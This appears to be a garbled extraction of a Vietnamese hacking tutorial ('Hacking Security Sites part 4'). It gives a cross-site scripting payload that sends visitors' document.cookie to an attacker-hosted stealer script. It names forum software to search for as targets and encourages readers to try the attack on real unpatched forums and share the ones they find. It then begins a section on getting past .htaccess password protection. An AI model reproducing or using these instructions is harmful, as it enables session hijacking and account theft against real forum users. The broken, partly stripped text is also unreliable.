tailieunhanh - Hacking Security Sites part 4
Còn một cách nữa để lấy cookie đựơc sử dụng trên các forum bị lỗi nhưng chưa fix , khi post bài bạn chi cần thêm đoạn mã sau vào bài của mình Hacking Security Sites part 4 | thông tin và có khi có cả cookie của nạn nhân khi họ mở dữ liệu có chứa đoạn mã này rồI tự động save thông tin đó thành file ip của nạn nhân .txt . _ Còn một cách nữa để lấy cookie đựơc sử dụng trên các forum bị lỗi nhưng chưa fix khi post bài bạn chi cần thêm đoạn mã sau vào bài của mình CODE với host_php là địa chỉ bạn đã upload file ăn cắp cookie đó lên . và là file VD của tôi . _ Ví dụ khi áp dụng trong tag img ta dùng như sau CODE hoặc CODE img javascript x3cimg src http host_php docs escape document .cookie x3e _ Bạn có thể tìm những trang web để thực hành thử cách trong VD này bằng cách vào tìm những forum bị lỗi này bằng từ khoá Powered với những forum sau ikonboard Ultimate Bulletin Board vBulletin Board Snitz . Neu các bạn may mắn các bạn có thể tìm thấy những forum chưa fix lỗi này mà thực hành ai tìm được thì chia sẽ với mọi người nhé . _ Còn nhiều đoạn mã ăn cắp cookie cũng hay lắm các bạn hãy tự mình tìm thêm . 22 . Cách ngắt mật khẩu bảo vệ Website _ Khi các bạn tới tìm kiếm thông tin trên một trang Web nào đó có một số chỗ trên trang Web đó khi bạn vào sẽ bị chặn lại và sẽ xuất hiện một box yêu cầu nhập mật khẩu đây chính là khu vực riêng tư cất dấu những thông tin mật chỉ dành cho số người hoặc một nhóm người nào đó Nơi cất đồ nghề hack của mà báo e-chip đã nói tới chẳng hạn . Khi ta click vào cái link đó thì thông thường nó sẽ gọi tới .htpasswd và .htaccess nằm ở cùng trong thư mục bảo vệ trang Web . Tại sao phải dùng dấu chấm ở trước trong tên file .htaccess Các file có tên bắt đầu là một dấu chấm . sẽ được các web servers xem như là các file cấu hình. Các file này sẽ bị ẩn đi hidden khi bạn xem qua thư mục đã được bảo vệ bằng file .htaccess .Hai hồ sơ này có nhiệm vụ điều khiển sự truy nhập tới cái link an toàn mà bạn muốn xâm nhập đó . Một cái quản lý mật khẩu và user name một cái quản lý công việc mã hoá những thông tin cho file kia . Khi bạn nhập đúng cả 2 thì .
đang nạp các trang xem trước